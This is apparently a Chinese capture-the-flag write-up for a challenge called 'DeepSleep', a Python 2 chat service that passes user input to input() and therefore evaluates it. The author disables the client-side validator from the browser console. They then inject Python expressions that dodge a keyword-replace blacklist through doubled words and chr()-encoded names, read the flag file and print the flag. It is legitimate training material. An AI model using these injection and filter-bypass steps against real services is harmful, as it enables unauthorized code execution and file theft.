

猫猫最近开发出一款新的AI语言模型DeepSleep :

```
try:
    question = input("").decode('utf-8')
except:
    question = u"服务器繁忙, 请稍后再试。"
try:
    response = (question
                .replace(u"请问", u"")
                .replace(u"问", u"")
                .replace(u"吗", u"呀")
                .replace(u"你", u"我")
                .replace(u"?", u"!"))

    print response.encode("utf-8")
```

为了猫猫的系统安全, 猫猫设置了非常严格的BLACKLIST哦, 会像上面的程序一样给你replace掉~ (前后端都有的那种nwn)

从题目提示可以知道这的知识点是python2的input函数, 在python2中input函数会把用户输入的字符看作命令执行

`raw_input()` : 将用户输入当作字符串处理 (安全的) 。

`input()` : 等价于 `eval(raw_input())`

查看源码可以看到过滤了很多关键字, 检测函数为validateInput, 我们可以重写这个函数, 一直返回真

```
const validation = validateInput(inputData);
if (!validation.valid) {
```

控制台输入, 之后就没用过滤了

```
validateInput=function(input) {
    return { valid: true, message: '' };
}
```

这必须要是字符, 所以用str转一下, 可以看到输入的字符串被回复了

# DeepSleep AI 聊天

在下方输入内容，DeepSleep 会即时回复你！

发送

已收到 DeepSleep 回复

你发送的内容: str('111')

DeepSleep 回复: 111

甚至可以执行语句

# DeepSleep AI 聊天

在下方输入内容，DeepSleep 会即时回复你！

发送

已收到 DeepSleep 回复

你发送的内容: str(ord('a'))

DeepSleep 回复: 97

用推导式想把flag文件内容读出时，发现有过滤

发送

已收到 DeepSleep 回复

你发送的内容: str([x for x in open('flag').read()])

DeepSleep 回复: 服务器繁忙，请稍后再试。

提示可以看到后台只是替换，可以双写绕过

```
str([x for x in opopenen('flag').rreadead()])
```

发送

已收到 DeepSleep 回复

你发送的内容: str([x for x in opopenen('flag').rreadead()])

DeepSleep 回复: 服务器繁忙, 请稍后再试。

还是不行, flag用chr绕过一下

```
str([x for x in opopenen(chr(102)+chr(108)+chr(97)+chr(103)).rreadead()])
```

```
str([x for x in opopenen(chr(102)+chr(108)+chr(97)+chr(103)).rreadead()])
```

发送

已收到 DeepSleep 回复

你发送的内容: str([x for x in  
opopenen(chr(102)+chr(108)+chr(97)+chr(103)).rreadead()])

DeepSleep 回复: ['f', 'u', 'r', 'r', 'y', 'C', 'T', 'F', '{', '3', '6', '0', 'c',  
'b', '7', 'a', '8', 'd', '0', '3', 'f', '\_', 'D', '0', '\_', 'N', 'o', 't', '\_', 'U', '5', 'e', '\_', 'I', 'n', 'p',  
'u', '7', '\_', 'I', 'n', '\_', 'P', 'y', 't', 'h', '0', 'n', '2', '}']

将列表一个个输出来, 得到flag

```
python
Python 3.14.2 (main, Jan 2 2026, 14:27:39) [GCC 15.2.1 20251112] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> str=['f', 'u', 'r', 'r', 'y', 'C', 'T', 'F', '{', '3', '6', '0', 'c', \
'b', '7', 'a', '8', 'd', '0', '3', 'f', '_', 'D', '0', '_', 'N', 'o', 't', \
'_', 'U', '5', 'e', '_', 'I', 'n', 'p', 'u', '7', '_', 'I', 'n', '_', 'P', \
'y', 't', 'h', '0', 'n', '2', '}']
>>> for i in str:
...     print(i,end="")
...
furryCTF{360cb7a8d03f_D0_Not_U5e_Inpu7_In_Pyth0n2} >>>
```

```
str=['f', 'u', 'r', 'r', 'y', 'C', 'T', 'F', '{', '3', '6', '0', 'c', 'b', '7',  
'a', '8', 'd', '0', '3', 'f', '_', 'D', '0', '_', 'N', 'o', 't', '_', 'U', '5',  
'e', '_', 'I', 'n', 'p', 'u', '7', '_', 'I', 'n', '_', 'P', 'y', 't', 'h', '0',  
'n', '2', '}']  
for i in str:  
    print(i,end='')  
  
#furryCTF{360cb7a8d03f_D0_Not_U5e_Inpu7_In_Pyth0n2}
```